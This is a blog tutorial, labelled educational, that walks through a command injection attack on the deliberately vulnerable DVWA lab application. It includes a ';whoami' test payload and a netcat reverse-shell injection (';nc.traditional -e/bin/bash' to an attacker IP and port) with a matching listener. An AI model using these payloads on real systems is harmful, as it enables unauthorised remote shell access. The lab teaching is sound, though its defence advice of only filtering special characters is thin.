Command Injection

 

For Educational Purposes Only.

Introduction:

Injection attacks are some of the most common attacks out there. It is featured in the OWASP Top 10 list of Web Application Security Risks. In this blog, we are going to study and do some practical pentesting with Command Injections

Working of Injection attacks:

The concept behind injection attacks is quite brilliant, to be honest. You would have come across text fields in websites that require you to fill them. The reason for their existence might be simple – to search the database in the backend for your account, or to ping another IP address or any other thing. As an attacker, you don’t want the website to work in the way in which it is intended. So you slightly modify your inputs. Instead of normal ones, you input malicious code in the text field (it might be for SQL, XSS, or anything). The application processes the code which causes it to behave or give an output which it shouldn’t have.

This is the basic idea of an injection type attack. It’s simple, yet it can cause huge amounts of damage to the website. The attacker can look at the passwords of the users, or he can simply delete the entire database just for fun or they can install virus and malware into the system – the options after this are nearly limitless.

Doing a command injection:

Command Injection is a type of injection attack where malicious input is fed into the command line (for example, Linux has Terminal as the command line) of a computer. In my opinion, this is the most dangerous injection attack out there. Why? Its because other injection attacks give access only to the databases while command injection gives the attacker access to the victim’s computer. The attacker then can perform privilege escalation to gain root access.

I have done a command injection in a website/virtual machine which is intentionally made vulnerable. Do not perform any attacks on websites in which you don’t have permission to do so.

1) Download and install OWASPBWA virtual machine.
OWASPBWA Download

This Virtual Machine is now the host for the IP/Website 192.168.139.129 (The IP address will vary for you). As the host is now up, the website will be available. So copy the IP address and type it in your browser to go to the website.

3) Go into the “Damn Vulnerable Web Application”. The username and password to get inside it are “admin” and “admin” respectively.

4) Go into the “Command Execution” section. This particular website is used to ping other IP addresses. Let's give “google.com” as input and see what the output is.

 

It does exactly what it said it would do. It pings the specified IP address 3 times and gives the output.

5) To see if a website is vulnerable to command injection, input the following command -

<IP Address>;whoami

 

What it does is that it inputs the IP address first. There is no problem with that. But in the command line, a “;” indicates that the code to the left of it has ended. This means we can type whatever we want to its right. If the website is invulnerable to command injection, it would show an error. But this website runs and gives the output for both the commands. So it is vulnerable.

 We can inject whatever command we want here itself, but it's not very efficient and not very fun too. So we are going to create a backdoor using NetCat.

Setting a backdoor using NetCat:

“Netcat is a computer networking utility for reading from and writing to network connections using TCP or UDP. Netcat is designed to be a dependable back-end that can be used directly or easily driven by other programs and scripts” -Wikipedia

We are going to use Netcat to create and connect to a backdoor in the victim machine.

1)Preparing to listen

First, let's tell our computer to listen for incoming connections. To do that, type

“nc -lp <port number>” in your attacking machine.

 

where nc = netcat

           l = Listen mode

           p = port

          <port number> = Whatever port you want to listen on. I’m choosing port                                            1234.

Our attacking machine is listening for connections in port 1234. Now let us set up a backdoor in the victim machine

2) Setting up a connection

Type the following in the text field in the website

    “;nc.traditional -e/bin/bash <IP address of attacker machine> <portnumber>”

where  “nc.traditional -e” = syntax

            “/bin/bash” = the bourne again shell which is used to run the Netcat script

            <ip address of attacker machine> = It is specified to locate us

            <port number> = The same port number as step (1) should be given here.                                           That way, both the computers can connect to the same port.

That’s it. Both the computers are connected. Now we can access the victim machine from the terminal of our attacking machine.

 

To test if it works, I’m doing a simple “ls” command which prints all the things in a specified directory.

It works!!

 

How to protect against command injection attacks?

The best way to protect your website is to filter the input for special characters. Characters like ; ‘ “ and many more are the main ones used in injection attacks. If the website filters these characters, the code itself is of no use.

Conclusion :

The power of Injection attacks lies in how easy they are to perform. This didn’t require any specific tool. All we needed was an inbuilt tool and a little command-line knowledge. Due to this, every website on the internet should take the necessary precautions to patch these vulnerabilities.